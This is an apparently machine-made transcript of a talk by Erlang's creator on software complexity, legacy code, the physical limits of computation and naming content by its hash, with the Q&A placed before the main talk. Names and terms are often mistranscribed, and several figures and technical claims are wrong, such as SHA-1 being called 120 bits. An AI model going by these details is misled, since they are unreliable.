Yeah, they have. Instead of climbing on board with the Haskell people and making a Cocoa Bridge that's good, they make their own one and they will gain market share due to that. In 15 years time, we'll be cursing them because they'll have all this legacy code that nobody knows how it works and will have changed language yet again. Can't they just join forces, please? Join the Haskell people or join the LN people, join the ML people. Don't make your own mistakes. Benefit from the previous mistakes that we've made. Yeah, these large legacy systems we built would be totally collapsed and are not used. I think while I talk about this tomorrow, management has this weird view that fixing up legacy code is, well, we've got all these millions of lines of code and you want to rewrite it all. Yes. It's going to be quicker. No, yes. They don't do it. So the new startups that do build, they don't take the legacy code. They just build it from scratch in the best technology of the day. Some of those are going to win. We'll go to Darwin-type survival of the fittest will happen. Software has hit complexity boundaries years ago and is in a complete mess. Functional programming offers some slight improvement on that. It's not proof. It's less things that you can shoot. Strong-type systems, things like that provide you with less ways to blow your foot off by mistake. Tomorrow's lecture, I'll keep saying three 32-bit integers in C have more possible states than the number of atoms on the planet. This machine, this is 250 gigabyte solid state disk. The number of states this machine can be in is two to the power of 250 giga. That is more than the total number of states in the universe. So when I've got a problem on my computer and say, well, I've got the same problem, I tried this and it worked, it doesn't work, that's because our machine is in a different state to start with. We need mathematics, we need strong tools to prove systems correct and we don't know how to do that. We need to compose systems from small bits where we tried to prove the systems correct and we need to build them together and we don't know how to do this. My generation of programmers in the last 30 years has created trillions of years of mess that you guys are going to have to clean up and I'll talk about that tomorrow. So I think that's about what I wanted to say. So thank you very much. Questions? What? Oh, sorry, yes. The question was, strings are just lists of characters. Why? Well, because that's the correct way to do it. No, I mean a string, well, in Erlang, a string is just a list of integers where the integers are code points and they can be unicode code points or Latin one code points or whatever you want. But there's no notion of a UTF-8 string or any particular encoding there. They're just syntactic strings don't exist. Okay, basically. They're syntactic sugar for these things with quotes around them. You see, it's just an internal representation of this literal that's got quotes around it. That's what you call a string. They don't actually exist. They're not like integers. Yes? Well, I had included, oh, well, I had list on my list. Oh, well, the list of functional languages, that was the evolution of Haskell. So, Lisp didn't play any role in the evolution of Haskell. But, yeah, okay, yes. Sure. No, no, no, no. Well, that thing I showed was an excerpt from David Turner's paper and it's what he wrote in his paper and he didn't include Lisp in that chain of history, as it were. Right. More questions? No. Okay. Thank you very much.
This talk outlines developments in programming from the beginning of programming (in 1948) to today. In particular I'll talk about the development of Erlang and about the trends in programming that lead to Erlang and what these trends mean for the future. Work on Erlang started in 1985, so we'll turn the clock back to 1985 and see what the world looked like then. C++, Java, Haskell, Javascript, Ruby, Python and Perl had yet to be invented. Most people believed, incorrectly as it turned out, that Ada and PL/1 would dominate the future. But I was more interested in Prolog and Smalltalk. Prolog was the answer, but I didn't know what the question was. I'll talk about how we grew a programming language, and what the main factors were in spreading the language. I'll relate my personal experience with Erlang to broader developments in programming and try to see how the two fit together. I'll also take a peep into the future and speculate about where computing is going.
10.5446/50608 (DOI)
No hands up. Yeah, when about two and a half years before I was born, the first computer ran at Manchester University. It had, I think it was 18 instructions, and it made use of the Williams tube, which could store 1,024 bits on a Caffèdre tube for up to an hour. And that was the first program that ever ran on a stored memory computer. It was in 1948. Of course, I didn't really know about that when I was born. I discovered computing when I was a bit older, about 16 or 17 and at school. And I wanted to learn programming. So we could choose between Fortran, Assembler, or COBOL. But Assembler and COBOL weren't options because nobody knew how to program in them. So I had the choice of only Fortran and had a turnaround time of three weeks when you'd written a program. Now the situation's a bit better. Well, perhaps it's a bit better. So you guys, when you're starting out, instead of having a choice between three different languages, have a choice between 2,500 different languages. So there's much more to choose from. On the other hand, it's not easy to make that choice because there's so many bloody languages you don't know. Which language to choose? So I think actually we got into a slight mess and there went my slides. Hello. What happened to the slides? Is this me or you? Oh, no. There we go. They're back again. Isn't it marvelous? Right. Was that the second slide? That was the second slide. Yes. I started programming when I was about 17 and always been kind of intro. Whoops. That's the third slide. Why are they moving forward automatically? I didn't. Hey, stop it. Go away. Look. Right. Now don't do this to me. What? There's a little, which is that one? That one there. Right. So now it'll step forward. And if I could double click outside, that will that. Very good. Now it's not going to move forward. Is that right? Keep our fingers crossed. Right. So I'm going to, in this lecture, talk about three things, actually. I think we're in a bit of a mess, actually. So I'm going to go into why we're in a mess and tell you what the symptoms of the mess are and the causes of the mess. That's about the first third of the lecture. And then there's about a third of the lecture. I used to be a physicist, actually. So I'm going to talk about the physical limits of computation and what that means for computer programs and so on. And then since we're in this mess and I've contributed to making this mess, I've got some vague ideas about how we might conceivably get out of the mess. So I'll talk about that as well. So the start point for this, I think, I'm going to go back to about 1985, because that's when I was a young sort of, how old, of 85. I mean, I was a young 35-year-old with a gleam in my eye and thought, I'll invent a new programming language which the whole world will use. And to help me, I had these wonderful things here. So this is a computer from 1985. For comparison, it's a supercomputer from a couple of years ago. This little fella had 256 kilobytes of RAM. You could stick cards in it so you could get an amazing three megabyte. You filled it full of cards. You get three megabytes of memory. Isn't that a lot? You get eight gigabytes on a stick now. It had this blindingly fast eight megahertz clock. And it had a 20. Or if you had a lot of money, you could buy a 40 megabyte disk. So it wasn't really very good for downloading movies, because movies, digital movies hadn't been invented. They were like 800 megabytes anyway, so they wouldn't fit. What's missing from that list? That's the spec of 1985. What's conspicuous by its absence? What? A mouse. No communications. This thing can't talk to the internet at 100 megabits per second. It had no communications. That's a big thing that's changed. Now if you buy a computer, it's got a 100 megabit ethernet connector or something. It's got a Wi-Fi. You've got LTE and 4G and 3G and stuff. And you can connect to the internet at hundreds of megabits per second. Couldn't do that then. Distributed computing is only something that's emerged from about 1990 onwards. Only 10 years, 15 years into this period of distributed computing. That's radically changed what's going on. So that was the start point. And now we've got these supercomputers. So this guy, let me see. Well, it had 8 gigabytes of memory or typical laptop today, this little thing. 8 gigabytes of memory. That's 32,000 times the memory of the machine in 1985. Maybe a new laptop's a quad core running at 2.5 gigahertz. So it's 1,000 times faster. And it's got 250 gigabytes of solid-state disk or something like that. So it's maybe 1,000 times faster. So the machine that booted in 120 seconds in 1985 should boot in 120 milliseconds today. Does it? Does your machine boot in 120 seconds? No, it doesn't. So what the hell went wrong? What have we done as an industry? What have we got wrong? So I'm going to look at some of the things we did that were wrong. Right, so in the last 40 years, we've written a ton of code, millions of lines of code. But we have created an industry that will take up trillions of man hours to fix it. So you guys are going to say, I should retire and die. And you guys can live on and fix all this complete mess we've made. So welcome to programming. Now I'm going to look at some of the things they said about programming languages when I started and compare them to what we say today. And we'll see exactly the same thing. I mean, 1985, we're all going to program in PL1 and ADA. That's the future. Just forget about anything else. How many people program in PL1 here? Right. ADA? Oh, sorry. Well done. So you're believing this 1985 stuff and you're not going to change, right? So I take this with a pinch of salt. We're all going to be programming in C minus plus minus tran in the next million years. It's a load of rubbish. Well, when the hardware doesn't change, the programming languages don't change. So if the hardware is basically the same, the programming language will follow some S curve where you find a maximum and a most efficient way of programming that hardware. And then when the hardware changes, you'll suddenly start changing the programming models. So in fact, we've seen two changes in architectures in the last 15 years or so. The first thing is ubiquitous computing. I mean, the internet and being permanently connected to the internet at high bandwidth. That started in about 1990. By 2000, it's a fact. The significant factor there is this permanent connection wherever you go. It's in your pocket, it's through LTE or something like that. And that means you need to know about distributed programming if you want to build interesting applications. All the interesting applications are distributed. The second thing that's happened is the multi-core thing that happened in 2004. That was inevitable. It was predicted around about 1998 or something like that. Chips got bigger and bigger and bigger. And the clock speed got faster and faster and faster. But then a physical limitation hit in. You couldn't get from one side of the chip to the other at the speed of light. Because the speed of light is finite. It's not infinite. And so the synchronous chip design vanished. And you put multiple cores on with their own clocks. And that's because of the speed of light. You could also drop the voltage. So you can run at lower power because of that. So in the future, we're going to see. I mean, I've got, I'm experimenting with 64 core low power processor at the moment. Should see 1,024 core low power processors coming onto the market in 2015. And they're going to influence how we do things. So we've got a change in the hardware. And that will reflect in the change in the programming language. No programming languages have been explicitly designed with distribution, multi-core, and low power in mind. I haven't seen any languages that have been designed with that in mind. We're working on it. So we'll see what happens, sir. Right. And when those change, the languages will change. Right. So what are the problems? This lecture, what are the problems? What are the laws of physics have to say about computation? Can we get out of this mess we've got ourselves into? Right. So what are the problems? Here's a few problems. Legacy code, complexity, all this kind of stuff. I'm going to talk about each of those in turn. So legacy code. This is great. Legacy code is when all the programmers who wrote the stuff are dead. Right, that's legacy code. And it's a pain in the ass. There's no specific. Have you ever seen a program that had a specification? Well, I've seen a lot of programs, and I've seen a lot of specifications. And the two normally don't have anything to do with each other. They're kind of a vague description of what the program might do on a good day. They're written in archaic languages, which nobody understands. Right, that's great. You want to be a maintenance programmer? Here's half a million lines of COBOL. Wow. Cool. That's just what I wanted to do. You've got to change one line of it, but which line? That's the problem. Nobody understands how this stuff works. And it works. And then we've got business value. We've got managers who say, well, this legacy code, this million lines of stuff written in COBOL.Tran4 has got commercial value. It's got business value, so we can't touch it. And to rewrite it, because the first time it was written, took a million man hours or something to rewrite, it's going to take 10 million man hours. Of course, nobody knows what it does. It might not. Right. So it might not. So management thinks that modifying legacy code is cheaper than a total rewrite. They are nuts. They're completely lunatics. Sometimes it is. If that legacy code is in good order, but often it's not. Right. So what you do is legacy code. Don't touch it. Put it in a virtual. This is what you do. You put the legacy code in virtual machine. Don't mess with it. So you've got all these little black boxes running legacy code, which nobody knows what it does. And it's just sitting there festering like a nasty wart or something that will come and hit you one day. Horrible stuff. But it's created a lot of job opportunities. So it's pretty good. Complexity. Complexity. Right. So I have to sort of remind myself of some numbers. You can see a lot of numbers in this talk. So the mass of the Earth, I used to be a physicist, the mass of the Earth is six times 10 to the 27 grams. And the Earth's got about 10 to the 50 atoms in it. Just remember that number. 10 to the 50 is a nice number. So we do a back of envelope calculation. Here's my envelope. And back of envelope. So if we take 10 to the 50, 2 to the 167, and divide that by 32 and take the ceiling of that, that's six. What does that say? That says six 32-bit integers has what's that? 192 bits. But the number of atoms on the planet is 2 to the 167. So what does that say? That says a C program with six integers has more possible states than the number of atoms on the planet. And don't ask about JavaScript. What about JavaScript? Well, three variables, actually, because they're double precision. So what does that mean? Well, it means you need more than six unit tests. If you've got six variables, or more than three unit tests, if you've got JavaScript variables. Just as an aside, my machine, little machine here, has got a 250 gigabyte solid state disk in it. That means the number of possible states it can be in is 2 to the power of 250 billion times 8. OK? The total number of atoms, not in the planet, but in the universe, the total number of atoms in the universe, is about 2 to the 260. That means the complexity. The number of states that my machine can be in divided by the number of atoms in the universe is 2 to the 7 billion. So I'd need 2 to the 7 billion universes filled with computers. And I might just find one that's in the same state as my computer. Right. So this is why. You know, I do things on my computer, and it doesn't work. So I Google. I say, blah, blah, blah, blah, blah, blah, blah, blah, didn't work. And I find a web person. He says, oh, I have exactly the same problem as you. Do this. And there's lots of mails after. I say, oh, gee, thanks. That's absolutely great, because I had exactly the same problem. And I type this stuff in. And guess what? It doesn't work. Shit. So I Google again. And I find I had exactly the same problem. So I Google again. And I do it. And it doesn't work. Why is that? Well, because his machine, when he did these commands, or she did these commands, is not the same as my machine. Its state is different. In fact, the chance that it's the same is one in 2 to the 250, blah, blah, times 8. Right. And I would need to be very lucky in being one of these universes of the 7 giga, 2 to the 7 giga universes, where the guy has just happened to post in his machine was in the same state as me. Well, it's not going to happen. And it happened surprisingly early. Last week, no week before last at work, we got, my and my colleague, we both got two brand new Apple Retina laptop thingamijigs. And they were factory new. And they were installed. And we were going to run the same software. So we thought, we'll do the install together so that our machines are in sync. And after four hours, I typed some commands on my machine and an install worked. And he typed the same commands on his machine. And the install failed. Right. And we'd be up to that. We'd been the same. And then what do we do? Well, he started googling, oh, how the hell I did it. I didn't work trying doing that. So they diverged after four hours. Of course, they weren't the same to start with. But you kind of think they're the same, don't you? It's not true. It's not true. So what's the answer to all of this? Well, scary math to the rescue. The trouble is, scary math hasn't got there yet. We don't have scary math to help us yet. OK? Because scary math is trying to prove things about the states of these programs. So the only way it can do it is prune the search space down to something that's manageable and then look at that. So you can't really prove things about programs of more than two or three variables in. So that's pretty tricky. Well, sometimes, if they're specially constructed, you can. So we can't really look to scary math to help us yet. It's coming along. It takes a long time. It takes like 100 years for somebody to get a good idea. And then it takes. I mean, look at the Lambda calculus. Church had invented the Lambda calculus in 1930. The type of Lambda calculus in 1936. And I think it got into Java this year, didn't it? Or last year or something. I mean, it takes rather a long time. And then nobody's had any ideas since church. So there you go. Failures. What about failures? Well, stuff fails. Deal with it. Stuff does actually fail. Computers fail. So there's only one way to handle failures. Do it on another. Joe's first theorem. In order to handle failures, you need two computers. Because if the whole computer crashes, you're screwed. Sorry, at least two. If you want to tolerate the failure of 100 computers, you need 101. Probability of them all failing at the same time is 2 to the power of 101. So it's low. But still might all fail. That means that you need to understand distributed computing because you've got two computers. You need to understand parallel computing because they're running at the same time. And you need to understand concurrent programming because the programs in them are running at the same time. So if you think you can do error handling or scalability without understanding these three things, it's not going to work. Now, I'm not going to talk about that. I've written three books about that and made a programming language to embody some of those ideas. And if you want to read more about that, you can read some of those. Right. Means because systems break, because they're becoming more complicated, we have to make them so that they will self-configure and they will repair themselves and they will evolve with time. I think they'll be like us. They'll gradually die. And it's a very interesting problem, handling dying chips, how they, I'm looking at that, multicores where the cores start failing. When we produce 1,000 core multicore chips, half a dozen of the chips won't work. And then as we run them, some of the cores will start failing. And we need to live with that. Don't want to throw them away because bits of them don't work. Languages. Language doesn't matter, they say. Well, they should have told the Romans. Do you do arithmetic like this? No. It's even worse. You see, Romans didn't have a zero. And they didn't have negative numbers. For a lot of, do you know how old negative numbers are? They're not very old. They were about, I can't remember the date, 1,700 and something. We need notations and things that are familiar and easy to work with. And if you're kind of in this mindset of programming in with numerals like this and somebody else is using Arabic numerals, you won't understand each other. You say, well, it's a lot easier using Arabic. No, no, no, no, no, no. I'm perfectly happy with this. I mean, I'm not talking about Jarbrun Haskell and things like that. I'm talking about Romans and things. But there are analogies to be made there. So 1985, everybody. So there's a little star there. Not absolutely everybody. Everybody knew the born shell, make and see. If there were sort of scientific, technical programmer sort of type. That meant they could talk to each other. Programmers could talk to each other. Well, now we can't talk to each other. We don't have these common languages. When you go to these big conferences, there's these.NET people. Any.NET people here? Right. Any JVM people here? Right. Oh, golly. I've been to other conferences. I say, any JVM people. Oh, the hands go up. And you say, any.NET people here? Nobody. And I'm a sort of neither a.NET or a JVM person. So I don't really belong here. I hope you won't eat me. It's like talking to the light. I've been thrown to the lions. 99% of the audience were.NET people. Oh, my god. What's.NET? You think I'm joking? I haven't actually got a window. No, none of my friends have got a Windows machine. I don't know what it is. Well, I used one. Well, that old thing, that had a Windows audience. Yeah. And so now what do we program for JVM.NET? We program in Ruby, do before, Tran, and the bubble. We can't talk to each other. Right. So we can't sort of send programs to each other. We can't understand them. So when I learned to program at Jews, I said this earlier, I can choose three languages. Now, first list I looked on, I looked on the Wikipedia. And it said there were 776 languages. Looked somewhere else, 2,500. There's a lot anyway. And then we have build tools. Well, once upon a time, I said everybody talk to make. Makes wonderful. I love make. And now there's Ant and Grunt and make, and Rake, and Malvin, and Jake, and Bacon, and BitBake, and Fabric, and Paver, and Shovel, and BitGrovel, and God knows what. And what the hell these things are. So I was researching this talk, and I looked up on Stack Overflow. And somebody asked the question, is there a rake equivalent in Python? Yeah, well, this paver, invoke Shovel, WAF, and well, that's really good. That's what I like. So a couple of months ago, I was writing this. I actually do some programming for my living at Ericsson. I was writing this program in Elling, and it was going to go into a product. I want to put it on the target. And so the guy says, well, we've got this script that does it. Just log in on this development system, and type make, because it was a make file, actually. Well, it evoked a bake file, no, a BitBake file, a bake recipe. And it was taking a while. I left it, and I went, oh, oh, oh, oh, oh, oh, oh. 18 hours later, it had downloaded 46,000 files, which included the entire source code of the Linux kernel and of GCC, compiled the whole bloody lot up, and then built a single image, when then it cryptographically signed it and done all this stuff. And then I could take my three-module program and put it on the target. Well, of course, Elling was designed to be object code compatible. So you just move the files over anyway. No, that's not possible. We have to use BitGrum Tour. I know you'll say you should have used Grunt, and it would have been easy, but I don't know how to build Grunt files. I'm sorry. This is not good, actually. Right. So without Google and Stack Overflow, programming would be impossible. I've shown these slides to somebody two days ago, and he said, well, when the internet stops, I can't program. Why didn't they go? It's really very good. And I don't think, oh, shit, it doesn't work. Oh, Google it is a very good programming paradigm. In fact, I think programming is going to stop. You see, if you plot, if I reckon the amount of time I spend fixing stuff that's broken that shouldn't be broken, corresponding to do real work where I'm just doing stuff, the fixing stuff that's broken that shouldn't be broken takes 30% to 40% of my time, and that is increasing with time. So I think in 10 years' time, nobody will be able to program anything you use that will be broken in 10 years' time, and you won't be able to program you. You'll spend all your life in Google searching for, well, why did my fucking program work? Because I've done this, and it's supposed to work, and it's not going to happen. Right, good. So efficiency, and I love efficiency. You know, programming language designers, they don't care about efficiency. All the programming, like Dennis Ritchie and everybody ever invented programming, don't think about efficiency. Think about correctness. Why is that? Because programming language designers get blamed. If a programmer writes a program and it crashes and kills somebody, you see, it's their fault, it's not my fault. You shouldn't have put it in your bloody language, right? So I'm more concerned about correctness than efficiency. So we have this sort of dichotomy between efficiency and clarity. So to make something clearer, you add a layer of abstraction. And to make something more efficient, you remove a layer of abstraction. So you're always kind of dicing around between these two alternatives. And of course, in the last 30 years, we have systematically chosen efficiency over clarity. Well, that's great. That's fantastic, because now we have machines that are so frigging fast, you can throw anything at them, and they do instantaneously, if the code is correct. Right. So about 20 years ago, I was telling my bosses at Ericsson, I was saying, look, this is stupid. What we have to do is write our software as clearly as possible. And there's a few lines of code with as closer correspondence as we can make it to the specification and to the mathematics. And then we'll be in a very good position in the future, because as processes get faster, we'll just be able to take this stuff. And one day, it will be fast enough. Right. So it's really simple. If you're in a program, you want to optimize it, make it 1,000 times faster, just wait 10 years. And it's really simple. Alan goes a million times faster by waiting 20 years. You just wait 10 years, it goes 1,000 times faster. Who's in such a bloody hurry? Why do we want it to be quick tomorrow? We're making this legacy code now, that if we don't fry the planet, and if we don't have a nuclear war, and if we don't have a pandemi, and if the nanorobots don't take over, and if we're not hit by an asteroid, and if there's not a supervolcano, it's going to last for a bloody long time. And you look back at this archaeological layer of crap that was done in the beginning of computing. And so why did they write it like that? Why didn't they just write it efficiently? Sorry, no, oh, sorry, clearly. Hey? And so what we see in the beginning of a technology is companies compete by being incompatible with each other, by being deliberately incompatible with each other. So the early browser wars were a Microsoft browser was deliberately incompatible with a Netscape browser. After 10 years of that, people say, hey, that's bloody stupid. Let's try and make them. Let's not compete over browsers. Let's try and make them compatible with each other. So now we're into this. OK, the browsers are largely, they all use WebKit, and something like that. So they are compatible. So the wars are somewhere else. So we've got some decent functional programming. We've got Haskell, the LNG, things like that. And then, OK, so let's not use them, Microsoft. All there's some really good ideas in functional programming. I know what we'll do. We won't use them. We'll invent our own language, F sharp. That's nice. That's great. And then Apple comes along. Oh, there's some really good ideas in functional programming. I know what we'll do. Let's not use them. Let's invent our own one. Why is that? Why is Microsoft making F sharp? Why is Apple making Swift? To lock you in forever so that we can't talk to each other. Now that will last for 10 to 15 years. And then everybody will say, oh, this is a complete mess because we've got all this legacy code which can't talk to each other. We've got the.NET world. We've got the JVM world. And you guys can't talk to each other. But it becomes part of that legacy code which has to be maintained for thousands of years into the future. It's not a good idea. Contribute to the stuff. Now is not the time to be inventing new functional languages because that was done a while back. That was done in the 80s. So if Apple wanted to do something, make a Cocoa Bridge to Haskell or to Erlang so that we can really use Cocoa and the nice gooey stuff. Don't make your own thing because you don't have all the libraries. You don't have all the stuff going. Right, names. How we do for time? Golly. I have to speed up. Names. Names. We name things. Names are imprecise. Terribly difficult deciding on names. Unique names. I'm called Joe. Any other Joes? No. So Joe's unique in this namespace. But if it's a bigger namespace, there's lots of Joes. I'll talk more about that later. It's the root of all evil. Right, now it's a sort of changed subject now. This is light relief because I'm an ex-physicist. What do the laws of physics have to say about computation? Any other physicists? Good, thank you. Right. So my interest in this was spiking. I was reading the Elling-Manual pages. And it said, the return reference will reoccur. It's make a unique reference. It said the return reference will reoccur after approximately 2 to the 82 calls. And therefore, it is unique enough for practical purposes. I just wondered what this sentence meant. Well, 2 to the 82, that's 10 to the 25. Sometimes I use 2 to the, sometimes I use 10 to the. What do these numbers mean? Right. So in this physics, I'm going to talk about causality. Simultaneuity, entropy, speed, and computation, storage capacity. So causality to a physicist, a cause must proceed in an event. We communicate through messages, some rays of light, sound. You don't know about, you hear what I say a couple of milliseconds after I've said it. You see my arms waving about before you hear what I say. Your brain sort of sorts that thing out. You think it's simultaneously. Information travels at or less than the speed of light. You don't know how something is now. You knew how it was the last time you talked to it. So simultaneuity, this is basic sort of physics. We've got two stars, A and B. In different parts of the universe, and they explode at the same time. They explode at the same time. We've got three observers. And they look at that. Well, this guy over here, this bloke here, he's nearer to A than B. So light to him gets there first. So he says A exploded before B. And the guy to the far right, he says, well, B exploded before A. And the guy is in between them. He says, well, they happened at the same time. So physicists gave up this idea of simultaneuity for a long time ago. Prior to, you know, I mean, as soon as you realize that light traveled at a finite speed, that this whole notion of simultaneuity is vanished from physics. You're not allowed to talk about simultaneuity. So if you put it into sort of computer terms, try and replicate data. Suppose you've got a server A where you store something and a server B where you keep a replica. If you update X on A, you send X equals 10 to B and it replicates it. It sends an act back to A. Trouble is that B doesn't know that A knows that the value is replicated, because it doesn't know that the act signal has got there or not. They can't make any assumptions about that. So if B wished to know that A was replicated, i.e. that it had the same value, because it doesn't know that the act signal has got back there, you'd have to send an act signal back from A to B. But A doesn't know that the act signal has got back to B. This is called the Byzantine general problem. And it's a very simple impossibility proof that when you've got data in two different places, there is no physical law that can determine that. They're the same. You're violating the laws of physics, if you say they're the same. What does that mean? It means that two-phase commit doesn't work. It actually means that three-phase commit doesn't work. Well, it actually means that infinite-phase commit doesn't work. So you can't have data in two places and know that it's the same. It's a law of physics, which we break a lot. It's not a good idea breaking the laws of physics. They're there for a good reason. Entropy always increases. Entropy is the amount of disorder in a system. If you take a load of dice, you chuck them up in the air, they're not all going to land with one up, or always six. They're going to become more and more disordered. This is the second law of thermodynamics. Entropy always increases. In software terms, it means systems become more disordered all the time as you build them. This is the law of physics. Speed of computation. This is quite fun. Who are the geysers here? That's a little quiz. Who's this guy? Sorry? Yes, that's right. Yes, that's Albert Einstein. This is Hans Joachim Bremermann. Who's this guy? No? Yes, Planck, Max Planck. So Max Planck is kind of a phabric quantum mechanics. One of his relationships is E equals H mu. E's the energy of a black box radiator. A black box radiator couldn't radiate in different frequencies. And the energy in a particular frequency is Planck's constant times mu. OK, so that's one of Planck's relationships. Einstein said, well, E equals M. Everybody knows E equals Mc squared. That's the amount of energy in a given mass. So Mr. or Dr. Professor Bremermann said, well, if E equals H mu and E equals Mc squared, then H mu is Mc squared. Just knock out the E. And mu is M times C squared over H. So C squared over H is called the Bremermann limit. And it's 1.36 times 10 to the 50 hertz per kilogram. OK, so that says that a 1 kilogram computer, a 1 kilogram of anything, it doesn't matter what it is, a 1 kilogram of anything can oscillate at a max of 10 to the 50 cycles per second. That's an upper limit on how fast an oscillator can run. That's a clock frequency of a kilogram of stuff. They can't go faster than that due to quantum mechanics. Right. So not only is there the Bremermann limit, there's Bremermann's limit, the Margolius-LeVintien theorem, the Birkenstein bound, the Landau limit. We all familiar with these. So I'll just go through them very quickly because they tell us important things about computing. So the Bremermann limit, that says that the max clock rate of a 1 kilogram computer is 1.6 times 10 to the 50 hertz C. The Margolius-LeVintien theorem, that relates computation to energy. We can do 10 to the 33 operations per second per joule. The Birkenstein bound, that tells us how tightly we can pack information. What is it? 10 to the 43 bits per meter times of, sorry, wait a minute, per mass and meter. You take the mass of the thing and the radius of the sphere. That's the maximum stuff. And then the Landau limit, the minimum energy to change one bit of information. And that's 2.85 zeta joules at 25 degrees. I didn't know what a zeta, I had to look up what a zeta joule was. It's 10 to the minus 21 of a joule. There's another unit. I just invented it. It's FBDC. It's a Facebook data center. And that's 28 megawatts. So Facebook data center is 28 times 10 to the 6 joules per second. And the Landau limit is 10 to the minus 21 of a joule. So you see this 27 orders of magnitude difference. Of course, the Facebook data center is not just doing a one-bit operation. It's doing lots of bits operation. But you get some idea of that. So let's build the ultimate laptop and see what that is. Well, as you add more and more components, it gets hotter and hotter and the component density gets greater and greater. So the ultimate laptop is a black hole. Of course, we squashed all this stuff into it. And it runs at this Bremerhauer limit. What was his name? Bremermer. I forgot the name. So it's running at 10 to the 51 operations per second. So you think, well, this is bloody useful. I can do a lot in that. But there's a problem. It's pretty small. It's 10 to the minus 27 of a meter big. So you might drop it and not be able to find it. It's got a storage capacity of 10 to the 16 bits. And above all, it lives for 10 to the minus 21 of a second. So yeah. But it's done 10 to the 31 computations during that time. And you might ask, how does it get out? Black hole stuff goes into black holes. You might have heard this. Stuff falls into black holes. But it can't get out. Well, that's not true. Stephen Hawkins found there's something called Hawkins Radiation that comes out of a black hole when you drop stuff into it. So if you take an elephant and you drop it into a black hole, you get an elephant's worth of energy that comes out of the black hole. But how does it come out? Oh, there's a picture. Nice picture from Scientific American. What happens is outside the black hole, things are falling into the black hole. They split into pairs. Particles and antiparticles, say one of them drops into the black hole. They're split pairs. So their spins and things are equal and opposite. And provided nobody measures them or does anything, you're fine. When you change the spin or something of the thing inside the black hole and somebody measures it outside, it instantaneously has this value. It's called quantum entanglement. Einstein called spooky action at a distance. He didn't believe in it, actually. So there's a kind of technical problem. A, how to encode our program. We drop it into a black hole and the answer instantaneously appears due to quantum entanglement somewhere else in the universe. These are technical problems which I leave to future programmers and physicists. Not quite sure how to work it. Oh, well, hang on. That was the ultimate laptop. What's the ultimate computer? Well, that's the entire universe behaving as a black hole, right? It's a black hole computer that's, you know, it's the ultimate computer. So we could ask the question, how long, how many operations has the universe done since it was booted? So you boot the universe and you wait 10 to the 10 years about now. And, well, it's done 10 to the 1, 2, 3 operations since then. Okay? This is as a quantum computer. Its size is 2 to the 26, 2 times 10 to the 26 meters and it will live for 10 to the 10 to the 100. Well, that's a Googleplex. Nobody really knows. It's like cool down and die, I suppose, I don't know. So that's giving you some sort of, if the number of operations, the entire universe, working as a quantum computer since it was created is, what did I say, 2 to the 409. If you wanted to craft a crypto key that's, you know, by systematic search of all keys and you've got a 512-bit key to just go through them all one at a time. If you could go through them on one clock cycle, it would take 2 to the 103 universes to do that. It's actually cryptographers use measures from quantum mechanics to set the upper bounds on the complexity of the algorithms. So you don't actually need to, you don't need infinite length keys. You just need to set them in relation to the size of the universe and then you're fine. And yeah, okay. So there's some paper-safe reader. There's a very readable article in Scientific American about black hole computers from 2012. Fun facts and figures. Oh, this is wrong, I noticed. One kilogram can do 10 to the 51, store 10 to the 31. And I wrote it, it's a 10 giga gigahertz. That's obviously not a giga gigahertz machine, it's a giga giga giga giga giga giga giga giga giga giga giga giga. Oh, I forget it. I mean, it's fast. It's faster than this thing, anyway. A conventional computer can do 10 to the 9 operations per second if you compare it to the black hole computer. And the universe can store 10 to the 92 bits of information. Multiply 92 times 3 is about 270. So the number of bits in the universe is about 2 to the 2 to the 290. So for a 290-bit checksum, you're about on par with the number of bits you can store in the universe. So SHA1 is 120 bits. It's not enough if you want to store a checksum of everything in the universe. It's probably good for the earth, so it may be all right. I have to think about that. Exercise. So the number of bits should a checksum have to uniquely identify every atom on the planet. Answers on the back of an envelope. Right, it's a third bit. Golly, I have to speed up. So we created all this mess. We've got the laws of physics. What are we going to do about it? Right, so I have a little proposal here. We've got to break the laws of physics. We can reverse entropy if you put energy into the system. We've got to build the condenser. The condenser should have made a better size like a meat machine. You put all files into it and you turn the handle and less files come out. So we condense. You see, what we've been doing in the past is we've been expanding the amount of information. Right. So let's break this. Just breaking the second law of thermodynamics. We can do that if we put energy into the system. That's fine. Why did the number of files increase? Well, you start off with files and you make more, you take a file and you edit it and you do this and you do that. That's entropy increasing. Files mutate. When you've got a file, well, disks are really huge. Every time I buy a new computer, I just copy all the stuff I had on all my old computers onto it. Just a complete mess. I can't find anything on it. I mean, I've got 43,000 Erlang files on my machine. I can't find anything in them. Then you have a file. You've got some data. You say, well, I wonder what file name I should have. Oh, okay. I don't know. I wonder what directory I should put it in. Oh, I don't know. I wonder which machine I should store. I don't know. And that problem gets worse and worse and worse as you have more and more files. It gets far worse when the system becomes distributed. Right. So I want to declare the war on names. You know, the war on terror. There's a war on poverty. We programmers, we should declare the war on names. It's kind of been, you know, Git's quite good. It's declared the war on names nicely. So we shouldn't have any names. So a few examples. To talk about things, they need names. We can't talk about something if we can't name it. It's a basic philosophical fact. Okay. So here's a paragraph of text. Cup of tea. He sat down, cut a buttered slice of toast. He tore away the burnt flesh and flung it to the cat and so on. What's that from? I know you'll use Google. Any guesses? James Joyce is from Ulysses. Because that paragraph has no name, we can't talk about it. So let's name it. Well, it's not really a name. Okay. So there we go. Just compute it's SHA1 checksum. Right. The name of that paragraph is 79.915.0AD. So given that name, I can tell, that's not really a name, it's a hash. Given that hash, I can tell anybody. I'm talking about the paragraph. Well, not about the paragraph. I'm talking about 79.915. Blup, blup, blup. We've uniquely named this. There's no ambiguity whatsoever. Right. So imagine, let's do away with these URIs. They are evil. They are silly idea. Well, they're not a silly idea, but they're okay for a props emotion to the truth. So look at this thing. It's got two parts. It's got a host name. Use DNS to look the host name up and then it's got a resource name. Well, DNS can be spoofed. A naughty person can put a false thing into DNS or send you to the wrong DNS. If the resource was changed, this reference is wrong. It points to the, you know, that reference you found in a file or something, it points to that. But somebody changes that, what do we call it, ABC. They change the content of C. You still got a reference to the old C. You get the new C. If you put a time to live or a caching in, you wouldn't know what time to put it in. Suppose you put this in a cache and it says time to live for 10 minutes and the guy changes it after five minutes. You can't invalidate the cache or something like that. There are all sorts of problems with this. And the content can be changed by a man in the middle. Bad guys can listen to this stuff and change the content. So we don't want this at all. So let's do it like this. Instead of having a URI, we'll make a new type of thing. We'll just say hash and there's the name. Just go and get, notice there is no host name. There's just the hash of the content. The nice thing about this is, you say to this, go find this thing, go find this blob that has this hash. So no man in the middle can attack that thing because you get the blob back. You compute the hash. That is what you're asked for. So no man in the middle can change this. No man in the middle can attack this. No DNS thing can spoof this. If you get an answer, it's what you asked for. It is completely safe. 